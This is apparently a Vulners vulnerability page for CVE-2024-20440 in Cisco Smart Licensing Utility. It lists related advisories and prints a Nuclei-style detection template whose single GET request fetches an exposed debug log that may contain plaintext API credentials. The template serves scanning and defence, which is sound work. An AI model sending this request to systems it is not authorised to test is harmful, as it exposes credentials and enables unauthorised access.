| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| The vulnerability of the Cisco Smart License Utility software management software lies in its ability to disclose information through registration files, allowing a violator to gain unauthorized access to confidential information and unauthorized access to the API. | 6 Sep 202400:00 | – | bdu_fstec | |
| CVE-2024-20440 | 4 Sep 202420:15 | – | circl | |
| Cisco Releases Security Updates for Cisco Smart Licensing Utility | 10 Sep 202412:00 | – | cisa | |
| Cisco Smart Licensing Utility Vulnerabilities | 4 Sep 202416:00 | – | cisco | |
| Cisco Smart Licensing Utility (CSLU) 2.x < 2.3.0 Multiple Vulnerabilities (cisco-sa-cslu-7gHMzWmw) | 5 Sep 202400:00 | – | nessus | |
| Cisco Smart Licensing Utility 安全漏洞 | 4 Sep 202400:00 | – | cnnvd | |
| CVE-2024-20440 | 4 Sep 202416:28 | – | cve | |
| CVE-2024-20440 | 4 Sep 202416:28 | – | cvelist | |
| CVE-2024-20440 | 4 Sep 202417:15 | – | nvd | |
| CVE-2024-20440 | 4 Sep 202417:15 | – | osv |
id: CVE-2024-20440
info:
name: Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials
author: iamnoooob,parthmalhotra,pdresearch
severity: high
description: |
A vulnerability in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to access sensitive information.This vulnerability is due to excessive verbosity in a debug log file. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain log files that contain sensitive data, including credentials that can be used to access the API.
impact: |
Unauthenticated attackers can access debug log files containing plaintext credentials and other sensitive information, enabling further attacks on the system.
remediation: |
Update Cisco Smart Licensing Utility to a version that prevents log file exposure.
reference:
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-20440
cwe-id: CWE-532
epss-score: 0.51466
epss-percentile: 0.98809
metadata:
verified: true
max-request: 1
tags: cve,cve2024,cisco,smart,licensing,info-leak,vkev,vuln
http:
- raw:
- |
GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "csluev.log"
- type: word
part: content_type
words:
- "text/x-log"
- type: status
status:
- 200
# digest: 490a00463044022011a5905bcfcb126fd14ee5d1577355f8996c38ea94cdb203c1494328e0e2c10b0220111dbfce64a0d97f2ce2b2f144ee2e8366f8f12488792166c42e3f236bcc4367:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation